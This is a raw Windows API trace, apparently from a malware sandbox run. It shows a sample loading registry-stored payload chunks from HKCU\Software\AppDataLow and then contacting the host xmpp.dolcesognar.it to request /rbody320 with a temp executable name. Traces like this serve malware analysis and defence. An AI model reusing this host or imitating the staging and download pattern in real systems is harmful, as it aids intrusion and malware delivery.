	[0098.829] GetLastError () returned 0x0
	[0098.829] GetLastError () returned 0x0
	[0098.829] GetLastError () returned 0x0
	[0098.829] GetLastError () returned 0x0
	[0098.829] GetLastError () returned 0x0
	[0098.829] GetLastError () returned 0x0
	[0098.829] GetLastError () returned 0x0
	[0098.829] GetLastError () returned 0x0
	[0098.829] GetLastError () returned 0x0
	[0098.829] GetLastError () returned 0x0
	[0098.829] GetLastError () returned 0x0
	[0098.829] GetLastError () returned 0x0
	[0098.829] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_2") returned 10
	[0098.829] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0x72c, lpdwDisposition=0x0) returned 0x0
	[0098.829] RegQueryValueExW (in: hKey=0x72c, lpValueName="gpscsdch_2", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x3, lpData=0x0, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0098.834] RegQueryValueExW (in: hKey=0x72c, lpValueName="gpscsdch_2", lpReserved=0x0, lpType=0x258fc80, lpData=0x2750008, lpcbData=0x258fc8c*=0x7d000 | out: lpType=0x258fc80*=0x3, lpData=0x2750008*, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0098.904] RegCloseKey (hKey=0x72c) returned 0x0
	[0098.928] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_3") returned 10
	[0098.928] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0x72c, lpdwDisposition=0x0) returned 0x0
	[0098.928] RegQueryValueExW (in: hKey=0x72c, lpValueName="gpscsdch_3", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x3, lpData=0x0, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0099.011] RegQueryValueExW (in: hKey=0x72c, lpValueName="gpscsdch_3", lpReserved=0x0, lpType=0x258fc80, lpData=0x2750008, lpcbData=0x258fc8c*=0x7d000 | out: lpType=0x258fc80*=0x3, lpData=0x2750008*, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0099.044] RegCloseKey (hKey=0x72c) returned 0x0
	[0099.211] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_4") returned 10
	[0099.211] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0x72c, lpdwDisposition=0x0) returned 0x0
	[0099.211] RegQueryValueExW (in: hKey=0x72c, lpValueName="gpscsdch_4", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x3, lpData=0x0, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0099.220] RegQueryValueExW (in: hKey=0x72c, lpValueName="gpscsdch_4", lpReserved=0x0, lpType=0x258fc80, lpData=0x2750008, lpcbData=0x258fc8c*=0x7d000 | out: lpType=0x258fc80*=0x3, lpData=0x2750008*, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0099.406] RegCloseKey (hKey=0x72c) returned 0x0
	[0099.476] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_5") returned 10
	[0099.476] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0x72c, lpdwDisposition=0x0) returned 0x0
	[0099.476] RegQueryValueExW (in: hKey=0x72c, lpValueName="gpscsdch_5", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x3, lpData=0x0, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0099.486] RegQueryValueExW (in: hKey=0x72c, lpValueName="gpscsdch_5", lpReserved=0x0, lpType=0x258fc80, lpData=0x2750008, lpcbData=0x258fc8c*=0x7d000 | out: lpType=0x258fc80*=0x3, lpData=0x2750008*, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0099.568] RegCloseKey (hKey=0x72c) returned 0x0
	[0099.661] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_6") returned 10
	[0099.661] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0x734, lpdwDisposition=0x0) returned 0x0
	[0099.661] RegQueryValueExW (in: hKey=0x734, lpValueName="gpscsdch_6", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x3, lpData=0x0, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0099.706] RegQueryValueExW (in: hKey=0x734, lpValueName="gpscsdch_6", lpReserved=0x0, lpType=0x258fc80, lpData=0x2750008, lpcbData=0x258fc8c*=0x7d000 | out: lpType=0x258fc80*=0x3, lpData=0x2750008*, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0099.728] RegCloseKey (hKey=0x734) returned 0x0
	[0099.940] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_7") returned 10
	[0099.940] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0x754, lpdwDisposition=0x0) returned 0x0
	[0099.941] RegQueryValueExW (in: hKey=0x754, lpValueName="gpscsdch_7", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x3, lpData=0x0, lpcbData=0x258fc8c*=0x55832) returned 0x0
	[0099.948] RegQueryValueExW (in: hKey=0x754, lpValueName="gpscsdch_7", lpReserved=0x0, lpType=0x258fc80, lpData=0x5197800, lpcbData=0x258fc8c*=0x55832 | out: lpType=0x258fc80*=0x3, lpData=0x5197800*, lpcbData=0x258fc8c*=0x55832) returned 0x0
	[0099.959] RegCloseKey (hKey=0x754) returned 0x0
	[0100.292] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_8") returned 10
	[0100.292] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0x79c, lpdwDisposition=0x0) returned 0x0
	[0100.292] RegQueryValueExW (in: hKey=0x79c, lpValueName="gpscsdch_8", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x0, lpData=0x0, lpcbData=0x258fc8c*=0x0) returned 0x2
	[0100.292] RegCloseKey (hKey=0x79c) returned 0x0
	[0100.292] RegCloseKey (hKey=0x28c) returned 0x0
	[0100.292] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x58c7020, Length=0x3c0832) returned 0xd0a8230d
	[0100.316] Sleep (dwMilliseconds=0x17f8d) 
	[0110.322] GetLastError () returned 0x0
	[0110.322] GetLastError () returned 0x0
	[0110.322] GetLastError () returned 0x0
	[0110.322] GetLastError () returned 0x0
	[0110.322] GetLastError () returned 0x0
	[0110.322] GetLastError () returned 0x0
	[0110.322] GetLastError () returned 0x0
	[0110.322] GetLastError () returned 0x0
	[0110.322] GetLastError () returned 0x0
	[0110.322] GetLastError () returned 0x0
	[0110.322] GetLastError () returned 0x0
	[0110.322] GetLastError () returned 0x0
	[0110.322] GetLastError () returned 0x0
	[0110.322] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.323] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.324] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.325] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.326] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.327] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.328] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.329] GetLastError () returned 0x0
	[0110.330] GetLastError () returned 0x0
	[0110.330] GetLastError () returned 0x0
	[0110.330] GetLastError () returned 0x0
	[0110.330] GetLastError () returned 0x0
	[0110.330] GetLastError () returned 0x0
	[0110.330] GetLastError () returned 0x0
	[0110.330] GetLastError () returned 0x0
	[0110.330] GetLastError () returned 0x0
	[0110.330] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x258f910 | out: phkResult=0x258f910*=0xa2c) returned 0x0
	[0110.335] RegQueryValueExW (in: hKey=0xa2c, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x258f914*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x258f914*=0x4) returned 0x0
	[0110.335] RegQueryValueExW (in: hKey=0xa2c, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x0, lpData=0x51e0510, lpcbData=0x258f914*=0x4 | out: lpType=0x0, lpData=0x51e0510*=0x0, lpcbData=0x258f914*=0x4) returned 0x0
	[0110.335] RegCloseKey (hKey=0xa2c) returned 0x0
	[0110.336] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0", dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
	[0110.341] InternetConnectA (hInternet=0xcc0004, lpszServerName="xmpp.dolcesognar.it", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.342] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.343] GetLastError () returned 0x0
	[0110.344] GetLastError () returned 0x0
	[0110.344] GetLastError () returned 0x0
	[0110.344] GetLastError () returned 0x0
	[0110.344] GetLastError () returned 0x0
	[0110.344] GetLastError () returned 0x0
	[0110.344] GetLastError () returned 0x0
	[0110.344] GetLastError () returned 0x0
	[0110.344] GetLastError () returned 0x0
	[0110.344] GetLastError () returned 0x0
	[0110.344] GetLastError () returned 0x0
	[0110.344] GetLastError () returned 0x0
	[0110.344] GetLastError () returned 0x0
	[0110.344] GetLastError () returned 0x0
	[0110.344] GetLastError () returned 0x0
	[0110.344] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/rbody320", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84800300, dwContext=0x0) returned 0xcc000c
	[0110.344] wsprintfW (in: param_1=0x51e82a0, param_2="X-File-Name: %s" | out: param_1="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
